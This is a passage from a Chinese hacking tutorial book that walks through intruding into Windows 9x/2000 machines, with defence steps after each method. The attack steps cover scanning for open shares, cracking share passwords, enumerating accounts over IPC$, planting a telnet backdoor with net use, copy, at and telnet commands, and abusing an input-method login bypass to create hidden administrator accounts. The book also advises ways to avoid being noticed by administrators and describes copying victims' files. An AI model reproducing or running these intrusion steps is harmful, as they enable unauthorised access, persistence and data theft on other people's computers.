黑客入门到精通
黑客入门到精通
由于 Windows 的易用性,个人电脑用户普
遍使用 Windows 作为自己电脑的操作系统平
台,许多厂家也习惯使用 Windows 作为自己的服务器操作系统平台。根据 SANS 协会和美 国联邦调查局旗下的国家基础设施保护中心(NIPC)公布的最容易被攻击的十大 Windows 安全漏洞清单可以看出,Windows 是一个极不安全的操作系统,虽然微软曾宣称其 Windows
2000 的安全性达 C2 级,但是离用户的要求还差得太远。
第二章 入侵W indow s
● W i ndow s 系统安全分析
● 系统漏洞攻防
● W i ndow s 密码破解
正是因为有了这些漏洞,才会有黑客的存在,下面我们就来看看 Windows 有哪些漏洞,黑客是如何入侵
的?我们又该如何防范?
若能入侵到他人电脑的 Windows 中,并且可以使用资源管理器或网上邻居任意漫游和查看对方硬盘中
的各种数据与文件,同时可以任意修改,对入侵者而言当然是一件令人兴奋又刺激的事情。
2.1 W indow s系统安全分析
随着互联网的普及,再加上 Windows 漏洞百出,要对 Windows 操作系统进行简单的网络攻击变得轻而易举。
特别是那些安全意识不强的电脑用户,要想对他们进行攻击简直太容易了。 在进行正式的入侵之前,我们有必要先对 Windows 系统的安全进行一下简要的分析。 2 .1.1 为什么会存在安全缺陷
系统漏洞是指某个程序(包括操作系统)在设计时未考虑周全,当程序遇到一个看似合理,但实际无法处
理的问题时,引发的不可预见的错误。系统漏洞在某些情况下又称之为“安全缺陷” ,如果当系统漏洞被恶意利
用,就会造成信息泄漏、数据安全受到威胁、用户权限被篡改等后果。而对普通用户来说,系统漏洞在特定条
件下可能会造成不明原因的死机和丢失文件等现象。
漏洞的产生大致可分为以下两类:
① 在程序编写过程中的人为遗留。
某些程序员为了达到不可告人的目的,有意识地在程序的隐蔽处留下各种各样的后门,以供自己日后利用,
不过,随着法律的完善,这类漏洞将越来越少(别有用心者除外) 。 ② 受水平、经验和当时安全加密方法所限。
· 30 ·
受编程人员的水平问题、经验和当时安全技术、加密方法所局限,在程序中总会或多或少出现些不足,这
些地方有的影响程序的效率,有的会导致非授权用户的权利提升。
③ 由于硬件原因,使编程人员无法弥补硬件的漏洞,从而使硬件的问题通过软件表现。
当然,Windows 漏洞层出不穷也有客观原因,任何事物都不能十全十美,作为应用于桌面的操作系统
Windows 也是如此。
其实,我们大家都知道,安全与不安全从来都是相对的,就目前而言,还没有出现绝无漏洞的系统,我们
只能够以存在漏洞的多少以及危害程度来判定该程序的安全性。俗语说得好: “道高一尺,魔高一丈。 ”也就是
说,正因为有了这些漏洞的存在,才能不断完善和提高安全技术水平。
2 .1.2 我们使用的系统安全吗
通常的理论认为,Windows 系统之所以会受到众多黑客的攻
击,是由于它用得太广的缘故,但这并不是它遭受黑客频频攻
击的主要原因,而是 Windows 系统与其他系统相比来说更容易被
攻击。因为对于计算机来说,端口是最容易受到攻击的命门。
我们知道,微软从 Windows 诞生就开始奉行其一贯主张的
“用户所需要的是网络的兼容性和应用程序之间的兼容性” ,但
恰恰是这一点使他们忽略了超强的兼容性将会导致的安全问题。
大家都知道,Windows 的 NETBIOS,有大家熟知的 Windows
9X 共享密码验证漏洞,进入 Windows 9X 的共享如入无人之境。
目前流行的 Windows 2000、Windows NT 比这还更严重,不但会
泄露当前用户名和密码,黑客还可以轻易通过 NETBIOS 以当前用
户身份访问电脑。而且 Windows 2000、Windows NT 在默认情况
下是所有盘共享,如图 2-1-1 所示,而大多数个人用户使用电脑
都是以 Administrator 的身份登录电脑,那么黑客进入也就无所
不能了。
这是隐形共享,在资源管理器里没有手形图标,所以一般电脑用户可能并不知道自己的所有盘都处于
危险的共享状态。
另外,Windows 服务器的 IIS 服务,简直就是一个漏洞大王。拒绝服务、泄露信息、泄露源代码、获得更多
权限、目录遍历、执行任意命令、缓冲溢出执行任意代码,几乎你要什么有什么。只要稍微关注安全动态的朋
友都知道,IIS 一直被列入十大漏洞列表。
对于个人用户,还会遇到 IE 浏览器的大量漏洞、Outlook 的漏洞等,如最近炒得很热的可以执行任意命令、
执行任意代码的异常处理 MIME 头漏洞;原来 IE4.0 的 mshtml.dll 缓冲溢出漏洞;大量 JAVA、ActiveX 控件执行
任意命令的漏洞;Outlook 的地址簿文件缓冲溢出漏洞等。而 Outlook 是公认的“病毒传播能手” 。
对于本地计算机,有著名的绕过登录的输入法漏洞,这个漏洞如果开了终端服务远程也有效。还有 Windows
Scripting Host (WSH)可能引来的各种 VBScript (VB 脚本语言)编制的病毒、尤其是蠕虫病毒可以说是层出
不穷,也是一个传播病毒的帮凶。另外,Windows 允许远程访问注册表的功能,也会给黑客带来可乘之机。
图2-1-1 Windows 2000的默认共享显示
提示
· 31 ·
上面介绍的 Windows 漏洞,只是冰山一角。大家应该注意到上面列出的 Windows 应用的几个方面,本地、
个人用户、局域网、服务器应用都存在大量严重问题,当然,也还有没提到的账户弱口令密码等。
看了这些漏洞介绍,你还会认为你的系统“坚不可摧”吗?
2.2 系统漏洞攻防
前面已经对 Windows 的系统安全作了细致的分析,下面我们看一下如何利用漏洞来对 Windows 系统进行
攻击。
这里要提醒大家的是,不要只是沉迷于攻击别人,也一定要修筑好自己的“防御工事” 。 2 . 2 . 1 N etB IO S 漏洞的入侵与防御
1. 漏洞描述
NetBIOS 即 Network Basic Input Output System(网络基本输入输出系统) ,是一种应用程序接口(API),
系统可以利用 WINS 服务、广播及 Lmhost 文件等多种模式将 NetBIOS 名解析为相应的 IP 地址,从而实现信息通
讯。在局域网内部使用 NetBIOS 协议可以非常方便地实现信息通讯,但是如果在网上,NetBIOS 就相当于一个后
门程序,黑客可以利用 NetBIOS 漏洞发起攻击。
当我们在接入互联网时,实际上只需要安装 TCP/IP 协议,但在安装协议时,NetBIOS 也被 Windows 作为默
认设置载入了电脑,电脑也因此具有了 NetBIOS 本身的开放性,139 端口被打开。换句话讲,在不知不觉间,上
网电脑已被打开了一个危险的“后门” 。通过这个后门,黑客可以利用专门的工具扫描出我们共享的资源(包括
Windows 2000 的默认共享) ,再利用破解共享密码的工具破解密码(甚至有些共享根本就没有密码)后,就可
以进入相应的文件夹或磁盘,那时简直是想要做什么都可以。
NetBIOS 漏洞的攻击主要是针对 Windows 9x 的机器,因为 Windows 2000 至少还有一个登录密码在把
关,没有账户和密码不易连接。
2. 利用 NetBIOS 漏洞进行攻击
想要利用个人用户的远程共享漏洞很容易,只要使用扫描软件进行网络扫描,就会发现很多提供了共
享的肉机,Shed 就是这类可搜索共享资源软件中的佼佼者。
Shed 软件是一个绿色软件,无需安装。下面我们来看看利用 Shed 软件如何扫描具有 NetBIOS 漏洞的 Windows
9x 肉机。
具体的操作步骤如下:
① 只要双击 Shed.exe 程序就可以打开主界面,如图 2-2-1 所示,然后在起始 IP 和终止 IP 的框中写上想要
扫描的 IP 地址范围,然后点击“开始扫描”按钮。
· 32 ·
② Shed 的扫描速度极快,扫描结束后,会在主界面的“已探索共享资源”列表中显示扫描到设置了网络
共享的主机,双击驱动器图样的主机标识就可以展开该主机,显示其共享的磁盘或共享的文件夹,如图 2-2-2
所示。
③ 如果可以双击任何一个共享硬盘或文件夹,而目标机是 Windows 9x 的操作系统,且没有设置共享密码
的话,那可就真是如入无人之境了,只需点击其中“生活文摘”共享文件夹,就可以直接看到详细的资料信息
了,如图 2-2-3 所示。点击鼠标右键中的复制,然后粘贴到本地硬盘,就把目标机的资料盗到本地来了。
图2-2-3 查看到的详细资料
如果共享文件夹设有共享密码,或是使用 Windows 2000 的机器,会被要求输入共享用户名和密码,如图 2-
2-4 所示。
图2-2-4 要求输入用户和密码
图2-2-1 Shed程序的运行主界面
图2-2-2 扫描结果显示
· 33 ·
对于使用 Windows 9x 的机器,可以利用一个专门破解 Windows 9x 网络邻居密码的工具软件 Pqwak 来破解。
直接运行 Pqwak.exe 程序,输入机器名、共享名、IP 地址等信息,点击确定,很快就会在右下角显示出密码,如
图 2-2-5 所示的“123456”即为破解出来的密码。
图2-2-5 用PQwak破解出共享文件夹密码
Pqwak.exe 是破解网络邻居密码的工具软件,可用此工具查出共享密码的系统有:Windows
95、Windows
98、Windows 98 第二版、Windows Me。
在图 2-2-4 的对话框中,在用户名一栏填入机器名,对于 Windows 9x 机器来说,一般用户名就是机器名,
在密码栏输入由 PQwak 破解出来的密码,点击确定即可进入相应文件夹。
如果目标机使用的是 Windows 2000,Pqwak 程序就破解不出密码,此时只能采用别的方法如流光之类的工
具,先破解目标机的弱口令密码后再破解共享文件夹。在第 2.2.2 节,我们在针对 IPC$ 漏洞的入侵与防御中将
讲解获取 Windows 2000 中弱口令账户的方法。
3.防御方法
如果平时不需要 NetBIOS 提供的共享文件和打印之类的功能,就可以禁用 NetBIOS 协议或是关闭 139 端口。
① 解开文件和打印机共享绑定
鼠标右击桌面上的“网络邻居 | 属性 | 本地连接 | 属性” ,去掉“Microsoft 网络的文件和打印机共享”前
面的钩,如图 2-2-6 所示,解开文件和打印机共享绑定,这样就会禁止所有从 139 和 445 端口来的请求,别人也
就看不到本机的共享了。
图2-2-6 解开文件和打印机共享绑定
· 34 ·
② 禁用TCP/IP 上的NetBIOS
鼠标右击桌面上“网络邻居 | 属性 | 本地连接 | 属性” ,
打开“本地连接属性”对话框。选择“Internet 协议(TCP/
IP)| 属性 | 高级 |WINS” ,选中下侧的“禁用 TCP/IP 上的
NetBIOS”一项即可解除,如图 2-2-7。
③ 使用IPSec 安全策略阻止对端口139 和445 的访问
选择“我的电脑 | 控制面板 | 管理工具 | 本地安全策略
|IP 安全策略,在本地机器” ,在这里定义一条阻止任何 IP
地址从 TCP139 和 TCP445 端口访问我的 IP 地址的 IPSec 安全
策略规则,如图 2-2-8 所示,这样别人使用扫描器时,本
机的 139 和 445 两个端口也不会给予任何回应。
④ 停止Server 服务
选择“我的电脑 | 控制面板 | 管理工具 | 服务” ,进入
服务管理器,关闭 Server 服务,如图 2-2-9 所示,这样虽
然什么端口都不会关,但可以中止本机对其他机器的服
务,当然也就中止了对其他机器的共享。但是关闭了该服
务会导致很多相关的服务无法启动,机器中如果有 IIS 服
务,则不能采用这种方法。
⑤ 使用防火墙防范攻击
在防火墙中也可以设置阻止其他机器使用本机共享。
如在“天网个人防火墙”中,选择一条空规则,设置数据
包方向为“接收” ,对方 IP 地址选“任何地址” ,协议设定
为“TCP” ,本地端口设置为“139 到 139” ,对方端口设置
为“0 到 0” ,设置标志位为“SYN” ,动作设置为“拦截” ,
最后单击“确定”按钮,并在“自定义 IP 规则”列表中勾
选此规则即可启动拦截 139 端口攻击,如图 2-2-10 所示。
以上的几种方法中,根据机器本身的具体情况,选择
一种方法执行便可达到关闭 NetBIOS 协议的目的。
图 2-2-7 禁用TCP/IP 上的NetBIOS
图 2-2-8 用 IPSec安全策略阻止对端口 139和 445的访问
图 2-2-9 停止 Server服务
图 2-2-10 使用防火墙拦截139攻击
· 35 ·
除了关闭 NetBIOS 协议或是关闭端口以外,我们也可以采用以下方法来简单防范: ①关闭不需要共享的目录和外设属性,这是防范共享入侵的一种有效方法。
②使用复杂的字符来命名共享名称,这样往往会让 Net View 命令输出与一些扫描失效。 2 .2 .2 IP C $ 漏洞的入侵与防御
1. IPC$ 漏洞描述
由于 Windows 2000 的默认安装允许任何用户通过空用户连接(IPC$)得到系统所有账号和
共享列表,本来是
为了方便局域网用户共享资源和文件的,但是任何一个远程用户都可以通过利用这个空的连接得到你的用户列表,
这样一些别有用心者会利用 IPC$ 的这项功能,查找用户列表,并使用字典工具对主机进行攻击。另外在安装系统
时会创建一些隐藏的共享,通过“计算机名或 IP 地址 \ 此盘符 $”可以访问,也为密码攻击提供了方便的途径。
IPC$ 共享不是一个目录、磁盘或打印机意义上的共享。你看到的“$” ,它是默认的在系统启动时的 admin
共享。IPC 是指“InterProcess Communications” 。IPC 是共享“命名管道”的资源,它对于程序间的通讯很
重要。在远程管理计算机和查看计算机的共享资源时使用。
2. 利用 IPC$ 漏洞进行攻击
在 2.2.1 节中扫描到了某些机器的默认共享,但是却被告知需要用户名和密码,注意了,下面就是讲
解获取 Windows 2000 的账户和密码的方法。
黑客一般利用“小榕的流光”软件来对 IPC$ 漏洞进行探测。大家可到 http://www.netxeyes.org/main.html
去下载,这是一个兼备漏洞扫描和强大破解功能的软件。
流光软件能让一个刚刚会用鼠标的人成为专业级黑客,它可以探测 POP3、FTP、HTTP、PROXY、FORM、
SQL、SMTP、IPC$ 上的各种漏洞,并针对各种漏洞设计了不同的破解方案,能够在有漏洞的系统上轻易得到用
户密码。流光对 Windows 9X、Windows NT、Windows 2000 上的漏洞都可以探测。 运行流光主程序,主界面如图 2-2-11 所示。
图2-2-11 流光的程序主界面
· 36 ·
按“Ctrl+R”键弹出扫描框,在扫描范围栏里输
入你要扫描的 IP 地址范围,在扫描主机类型里选择
NT/98,如图 2-2-12 所示,确定后进行扫描。
有了不少 NT/98 的机器,现在我们可以正式开始
IPC$ 探测了。
鼠标右击界面上“IPC$ 主机” ,选择“探测”下
面的“探测所有 IPC$ 用户列表”命令,就会探测出
你给出 IP 地址范围的机器里的 IPC$ 用户列表,小心,
这里也可以扫描出这些用户列表中没有密码或是简
单密码的用户,如图 2-2-13。当然,得到用户列表
后也可以选用专门的黑客字典试探出密码来。
图2-2-13 探测结果显示
下面我们以 192.168.11.251 这个 IP 地址为例进行讲解,得到密码后,是如何获取对方的资源并留下后门的。
打开 Windows 2000 自带的命令提示行(在运行框里输入“cmd”命令) ,进入命令窗口,运行:
① C:\〉net use \\192.168.11.251\IPC$ 密码 /user:用户名
其中,用户名是用流光扫描到的用户,密码为该用户的密码。用此命令可以与 192.168.11.251 建立一个连
接,运行后显示“命令成功完成” 。这样通过 IPC$ 的远程登录就成功了。
② C:\〉copy srv.exe \\192.168.11.251\admin$
登陆成功之后先复制一个 Telnet 的程序上去, (小榕流光安装目录下的 Tools 目录里的 Srv.exe) ,这个程
序是在目标主机上面开一个 Telnet 服务,端口为 99(或者用其他后门软件开一个端口以供登录) 。这里的 admin$
指的是 c:\winnt\system32 目录,还可以使用 c$、d$,即 C 盘与 D 盘,这要看你复制到什么地方,以后可以利
用定时服务启动它。
③ C:\〉net time \\192.168.11.251
在启动定时服务之前,需要先了解对方的时间。用此命令可以检查目标计算机的时间。假设 192.168.11.251
的当前时间是 2002/7/19 上午 11:00,命令成功完成。
④ C:\〉at \\192.168.11.251 11:05 srv.exe
检查到目标计算机的时间后,就可以用 at 命令启动 srv.exe 了,这里设置的时间要在目标计算机时间后,
否则启动不了。显示:新加了一项作业,其作业 ID = 0。
⑤ C:\〉net time \\192.168.11.251
再查查到时间没有,如果 192.168.11.251 的当前时间是 2002/7/19 上午 11:05,那就准备开始下面的命令。
⑥ C:\〉telnet 192.168.11.251 99
这里用 Telnet 命令登录上去,注意端口是 99。Telnet 默认的是 23 端口,但是我们使用 srv.exe 在对方计
算机中为我们建立一个 99 端口的 Shell。这里不需要验证身份,直接登录,如果显示:c:\winnt\system32〉 ,表
明成功登录上去了。
虽然我们 Telnet 上去了,但是 srv.exe 是一次性的,下次登录还要再激活!所以需要建立一个 Telnet 服
务!这就要用到 ntlm(在小榕流光安装目录下的 Tools 目录里也可以找到) 。然后在本地打开命令提示符,另外
打开一个窗口,输入:
图2-2-12 确定扫描范围
· 37 ·
⑦ C:\〉copy ntlm.exe \\192.168.11.251\admin$
用 Copy 命令把 ntlm.exe 上传到目标主机上,然后回到刚才的 telnet 窗口,运行 ntlm.exe。 ⑧ C:\WINNT\system32〉ntlm
这里的 C:\WINNT\system32〉指的是目标计算机,运行 ntlm 后,将显示如下信息: Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
此时,说明已经启动正常。
⑨ C:\WINNT\system32〉net start telnet
然后直接用“net start telnet”启动 telnet,显示“Telnet 服务器正在启动” ,表明 Telnet 服
务器已
经启动成功。
⑩ Telnet 192.168.11.251
以后我们就可使用 Telnet 命令登录到目标计算机的 23 端口,输入用户名与密码即可进入,就像在 DOS 上操
作一样简单。这时目标主机就成为跳板了,可以利用它进入到其它的主机。
我们也可以直接在地址栏输入:\\IP 地址 \C$(或是 D$,E$ 等) ,可以看到机器上 C 盘(或是 D$,E$ 等)
的全部内容,如果是超级用户,还可以轻松地在对方机器植入木马,并执行一些操作,就跟我们用 Administrator
登录本地机器一样。
3. IPC$ 漏洞的防范
下面我们来看看如何防范 IPC$ 漏洞的入侵。
① 通过修改注册表来禁止建立空连接(IPC$)
选择“开始 | 运行” ,在运行框里输入: “regedit”回车后打开注册表,将 HKEY_LOCAL_MACHINE\SYSTEM\
CurrentControlSet\Control\LSA 的 RestrictAnonymous 项 设置为 1,可以禁止空用户连接,如图 2-2-14 所示。
图2-2-14 通过修改注册表来禁止建立空连接
另外,在 Windows 2000 的本地安全策略( “控制面板”|“管理工具”|“本地安全策略” )里,选择“本地
策略”的“安全选项”的“对匿名连接的额外限制”一项也可设置,双击该项即可对本地策略进行设置,如图
2-2-15 所示,在 3 个选项中选择“不允许枚举 SAM 账号和共享”即可禁止 IPC$ 空连接。 · 38 ·
图2-2-15 在本地安全策略中设置禁止IPC$连接
② 通过修改注册表来禁止管理共享 (C$,D$ 等)
打开注册表的 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet \Services\LanmanServer\Parameters 项:
对于服务器,添加键值 AutoShareServer,类型为 REG_DWORD,值为 0。
对于客户机,添加键值 AutoShareWks,类型为 REG_DWORD,值为 0。
③ 手工编写批处理文件删除默认共享
用记事本自建一个删除所有默认共享的批处理文件,放在启动栏里,每次启动机器时都自动运行,以删除
所有这些默认共享。批处理程序包含内容如下:
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有 e 驱,f 驱⋯⋯可以继
续用此命令删除)
最后保存为 autodel.bat 文件,放到启动栏里,一样可
以达到禁止所有默认共享的目的。
④ 关闭ipc$ 和默认共享依赖的服务即server 服务
Server 服务提供 RPC 支持、文件、打印以及命名管道
共享的服务,ipc$ 和默认共享要依赖于这个服务,只需要将
这个 Server 服务关闭即可关闭 ipc$ 和默认共享。进入“控
制面板”|“管理工具”|“服务” ,在右侧列表中找到 server
服务,鼠标双击它,进入 Server 的属性对话框,点击“常
规”选项卡,在启动类型中选择“手动”或“已禁用”均可
使机器在启动时不启用 Server 服务,如图 2-2-16 所示,从
而达到禁用所有共享的目的。
如果这台机器需要对外提供服务如 IIS 服务,则不能采用此方法。
⑤ 安装防火墙
为自己的机器安装一个网络防火墙,如天网个人网络防火墙,选择“只允许局域网的机器使用我的共享资
源” 、 “禁止互联网上的机器使用我的共享资源”或是“禁止所有人连接”等相关设置,如图 2-2-17,这样也可
图 2-2-16 关闭 Server服务
提示
· 39 ·
轻松防范别人共享我的资源。
图2-2-17 利用防火墙规则禁止不相干的人连接
⑥ 设置复杂密码
要防止通过 ipc$ 穷举密码,最简单的方法就是把密码设置得复杂一些,以免被黑客使用工具破解出来。
任何复杂的密码都有可能被破解,不过,越复杂的密码,被攻破的可能性也就越小。
用以上方法堵塞漏洞后,黑客没有机会进到我们的系统,但同时我们自己也没办法享受默认共享带来的方
便了。
2 .2 .3 W i ndow s 2 0 0 0 输入法漏洞的入侵与防御
1. 输入法漏洞描述
在安装 Windows 2000 简体中文版的过程中,默认情况下同时安装了各种简体中文输入法。这些随系统装入
的输入法可以在系统登录界面中使用,以便用户能使用基于字符的用户标识和密码登录到系统,在这种情况下,
应限制提供给用户的功能。然而,在默认安装情况下,Windows 2000 中的简体中文输入法不能正确检测当前的
状态,导致在系统登录界面中提供了不应有的功能。进而,黑客可以通过直接操作该计算机的键盘得到当前系
统权限,从而运行他选择的代码、更改系统配置、新建用户、添加或删除系统服务、添加、更改或删除数据⋯⋯
而且 Windows 2000 中文简体版的终端服务在远程操作时仍然存在这一漏洞,而且危害更大。Windows 2000
的终端服务功能能使系统管理员对 Windows 2000 进行远程操作,采用的是图形界面,用户在远程控制计算机
时其功能与在本地使用一样,默认端口为 3389,用户只要安装有 Windows 2000 的客户端连接管理器就能与开
启了该服务的计算机相连。
输入法漏洞使终端服务成为 Windows 2000 的合法木马,如果不是特别需要,最好不要开通终端服务。
2. 利用输入法漏洞进行攻击
这里以黑客利用开通的终端服务远程攻击为例来进行介绍。
提示
· 40 ·
① 首先需要运行 SuperScan 主程序,运行后出现如图 2-2-18 所示窗口。在开始处填上你要扫描的 IP 地址
段,结束处填上结束的 IP 地址段。
图2-2-18 SuperScan主窗口界面
如果你的网速和机器配置并不高的话,请不要扫描多个 IP 地址段。
②现在要做的是找到一台存在 3389 端口漏洞的
主机,这就是 SuperScan 大显身手的时候了,单击“主
机和服务扫描设置”选项标签,按照如图 2-2-19 所示
将 3389 端口添加到扫描列表中。然后点击图 2-2-18
中的“开始扫描”按钮即可开始进行扫描。
③假设现在已经得到一台存在 3389 漏洞的主机,
现在要做的是进入这台计算机中。这里要用到 W i n -
dows 2000 的终端服务客户端进行远程连接,如图 2-
2-20 所示。
我们需要在服务器处填上刚才扫描得到的 3 3 8 9
端口主机的 IP 地址,屏幕区域:640 × 480,800 ×
600,1024 × 768⋯⋯这是我们连接上去以后在自己
机器上显示的分辨率,建议设为 800 × 600。在启用数据压缩
处打上钩,其他的默认即可。然后点按“连接”按钮,就可以
看到熟悉的 Windows 2000 登录界面了。
④用输入法漏洞创建一个用户,并加入到 administrators
中去,或者将 guest 激活。建议最好激活 guest,因为这样不
容易被网管发现。
具体方法如下:
用终端连接器连接上几秒钟后,屏幕上显示出 W i n d o w s
2000 登录界面(如果发现是英文或繁体中文版,请放弃,然后
另换一个地址) 。然后用“Ctrl +Shift”快速切换输入法至全
拼,这时在登录界面左下角将出现输入法状态条。鼠标右击状
态条上的微软徽标,弹出如图 2-2-21 所示的“帮助”快捷菜
单,这表示该计算机依然存在 3389 漏洞。
图2-2-19 设置扫描端口
图2-2-20 终端服务客户端显示
· 41 ·
打开“帮助”一栏中的“输入法入门” ,弹出一个叫“输入法操作指南”的帮助窗口,在最上面的任务栏点
击鼠标右键,弹出一个菜单,如图 2-2-22 所示。
接着选择其中的“跳至 URL”项,则会出现如图 2-2-23 所示对话框。
这时候可以看到出现 Windows 2000 的系统安装路径和要求填
入路径的空白栏。比如,该系统安装在C盘上,就在空白栏中填
入“c:\winnt\system32” 。当然也不一定对方的 Windows 2000 是
安装在 C 盘,如果出错的话,可以用 file:///c:查看 C 盘的文件
名,笔者就遇到很多用户装的是双操作系统,C 盘装 Windows 98,
D 盘装 Windows 2000,也可以根据具体的位置定义跳转 URL,这
里的主机 W i n d o w s
2 0 0 0 是安装在 D 盘上的,填入“d :
\winnt\system32” ,然后点按“确定”按钮,就会在右边窗口出
现如图 2-2-24 所示的内容。
图 2-2-24 点击“显示文件”链接
点击“显示文件”连接,即成功地绕过了身份验证,进入到系统的 SYSTEM32 目录。如图 2-2-25 所示。
图2-2-21 计算机依然存在3389漏洞
图2-2-22 打开快捷菜单
图 2-2-23 填入URL
图 2-2-25 显示 SYSTEM32目录
· 42 ·
⑤ 现在我们需要获得一个账号,成为系统的合法用户。在该目录下找到“net.exe”文件,并为“net.exe”
创建一个快捷方式,鼠标右键点击该快捷方式,选择“属性” ,在“目标”处的“C:\winnt\system32\net.exe”
后面空一格,填入“user guest active :yes” ,如图 2-2-26 所示,然后点按“确定”按钮。 图 2-2-26 激活 Guest用户
相当于运行“net user guest active:yes”命令,将禁用的 Guest 用户激活,如果要激活其它用户,
只需将 guest 更换成相应的用户名即可。
当然也可以填上“user 用户名 密码/ add” ,创建一个新账号,如图 2-2-27 为创建了一个 winadin 的用户。
图 2-2-27 添加 winadin用户
相当于运行“net user winadin /add”命令,其中,winadin 为新增用户名。如果要新增其他用户名,将
winadin 更改为相应用户名即可。
然后再改变 winadin 的密码,还是在“目标”中的“C:\winnt\system32\net.exe”后面加上 user winadin
· 43 ·
xxxx,其中 xxxx 是你要设置的密码。
相当于运行“net user winadin xxxx”命令,其中,XXXX 为用户密码(更改为你想设置的密码,密
码位数自己决定) ,运行后可能没有什么反应,但是实际上已经填加了这个用户。 ⑥添加 winadin 用户后,如果只有一个普通用户的
权限是不够的,要提升权限,就要把 winadin 添加到管
理员组中去,在 net 后面加上“localgroup administra-
tors winadin /add”即可,如图 2-2-28 所示。
相当于运行“net localgroup administrators
winadin /add”命令,将 winadin 添加到 administrators
组中。如 果想将其它用户添加入管理员组 ,直接将
winadin 更换成其它用户名即可。
再运行一下机器,已经可以随时进入到他的电脑了,
并且具有管理员权限。
⑦连接到对方计算机。
我们使用终端连接器连接上去,填入刚才建立
的用户和密码,就可以像使用自己的电脑一样了。也可
以把它当做跳板利用。
⑧最后教大家一招,登录进入注册表以后修改如图
2-2-29 所示的相应键值,这样网管也不会查到。
图2-2-29 修改注册表禁止显示上一次登录用户名
3. 输入法漏洞的防范
一个小小的输入法漏洞,竟然可以使黑客轻易进入别人的机器,该如何来防范呢? ① 打上 Windows 2000 操作系统补丁。
Windows 2000 SP2 以上的补丁已经堵住了输入法这个漏洞,可以从下列网址下载补丁程序:http://
www.microsoft.com/china/msdownload/windows/default.asp。这里可以下载 Windows 2000 各阶段的补丁,后
阶段的补丁中包括前阶段的补丁,如 SP4 补丁中包括 SP2 补丁中的内容。你可以直接打上 Windows 2000 SP2 补
丁,因为 SP2 补丁已经包括了输入法漏洞的补丁,打上补丁之后,就消除了此安全缺陷,可使简体中文输入法
图2-2-28 添加到管理员组
· 44 ·
识别计算机状态并在登录时只提供适当的功能。
② 删除输入法帮助文件和不需要的输入法。
为了防止黑客通过输入法漏洞进行攻击,建议删除不需要
的输入法。对要使用的有漏洞的输入法则把那个输入法的帮助
文件删除掉。这些帮助文件通常在 Windows 2000 的安装目录下
(如:C:\Winnt)的 \Help 目录下,对应的帮助文件分别是:
(1)WINIME.CHM 输入法操作指南
(2)WINSP.CHM 双拼输入法帮助
(3)WINZM.CHM 郑码输入法帮助
(4)WINPY.CHM 全拼输入法帮助
(5)WINGB.CHM 内码输入法帮助
③ 停止终端服务。
选择“我的电脑”|“控制面板”|“管理工具”|“服务” ,
进入服务管理器,关闭 Terminal Services 服务,如图 2-2-30
所示。
但这种方法毕竟不太现实,对于用户来说代价太大,因为自己也不能使用终端服务了。 上面的几种方法,只要执行了其中的一项,就可以防止黑客对 Windows 2000 机器进行输入法漏洞攻击,用
户可以根据自己的需要选择。
2 . 2 . 4 W i ndow s 2 0 0 0 系统崩溃漏洞的攻防
1.系统崩溃漏洞描述
使用 Windows 2000 系统的终端用户只要按住右 Ctrl 键,同时再按两次 Scroll Lock 键,就可以让整个 Win-
dows 2000 的系统完全崩溃,但同时会在 C:\WinNT 下毁掉完整的当前系统内存记录,内存记录文件名是
memory.dmp。不过在默认状态下,这个奇怪的特性还是处于关闭状态的,所以我们一般没必要害怕。
可以通过修改注册表的方法把它激活,如果被人通过网络修改了,问题就有点麻烦了。
2. 利用系统崩溃漏洞攻击
①执行“开始”|“运行”命令,然后在打
开的“运行”窗口命令行中键入“Regedit” ,
接着单击“确定”按钮打开注册表编辑器。
②依次展开 HKEY_LOCAL_MACHINE\SYSTEM\
CurrentControlSet\Services\i8042prt\ Pa-
rameters 注册表项,然后在主键 Parameters
中新建一个双字节类型的键,并将名称设为
CrashOnCtrlScroll,如图 2-2-31 所示。
③接着双击新建的键 CrashOnCtrlScroll,
打开如图 2-2-32 所示的对话框,在该对话框中
把 CrashOnCtrlScroll 的值改为非零值即可,
如改为 1。
图2-2-30 停用Terminal Services 服务
图2-2-31 新建一个双字节键值
· 45 ·
图2-2-32 设置CrashOnCtrlScroll的值
④单击“确定”按钮,退出注册表编辑器,重启计算机后就可以尝试让系统崩溃了。 按照前面的漏洞描述按下按键后,计算机屏幕会变成黑屏,并将出现以下信息: ***STOP:0x000000E2 (0x00000000,0x00000000,0x00000000,0x00000000)
The end-user manually generated the crashdump。
其实 Windows 2000 这个奇怪的特性在 Windows NT4 中也同样存在,如果黑客或者病毒利用了它,是很
危险的。
3. 对系统崩溃漏洞的防范
为了防止黑客或者病毒利用这个漏洞来进行破坏性攻击,可以采用以下的办法来防范: ①修改注册表,将 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ i8042prt\Parameters 注册表
项中的 CrashOnCtrlScroll 删除。
②禁止远程用户修改注册表。
选择“我的电脑”|“控制面板”|“管理工具”|“服务” ,进入服务管理器,将 Remote Registry Ser-
vice(允许远程注册表操作)项设置为“已禁用”或是“手动” ,如图 2-2-33 所示,以防止黑客远程修改注册
表进行破坏性的攻击。
图2-2-33 禁止远程注册表操作
2 .2 .5 对并不安全的 S A M 数据库安全漏洞实施攻击
小博士,你好,常听别人讲SAM 什么的,你可以给我讲一下到底什么是SAM,它是起什么作用的吗?
· 46 ·
SAM 其实就是安全账号管理数据库(Security Accounts Management Database)的英文缩写,在 SAM
数据库中存放了本地计算机和操作系统控制域的组账号及用户账号信息,它是 Windows NT/2000 操作系统的
核心。
SAM对于Windows NT/2000系统来讲,真的那么重要吗?
在 SAM 数据库中不仅存放了域中各组的描述信息和权限信息,同时也存放了域用户的描述信息和加密
后的密码数据等,并且系统管理员账号 Administrator 的密码也存放在 SAM 文件中最后一个“Administrator”
字符串之后,所以,SAM 可以说是 Windows NT/2000 操作系统的核心。
在通常情况下,SAM 数据库对应于一个位于 WINNT/SYSTEM32/config 目录下的文件,该文件在系统运行时受
操作系统保护,因此,即便是超级用户,也无法直接打开它,如图 2-2-34 所示。 图 2-2-34 试图用“写字板”打开 SAM文件
当试图用写字板来打开 SAM 文件时,由于 SAM 文件受操作系统的保护,将显示如图 2-2-35 所示的错误对话框。
图2-2-35 SAM数据库文件受系统保护
黑客是无法直接打开 SAM 文件的,除非借助另外的工具,如用 pwdump3 导出工具先导出 SAM 文件,再用
L0phtcrack 来破解。
1. SAM数据库漏洞描述
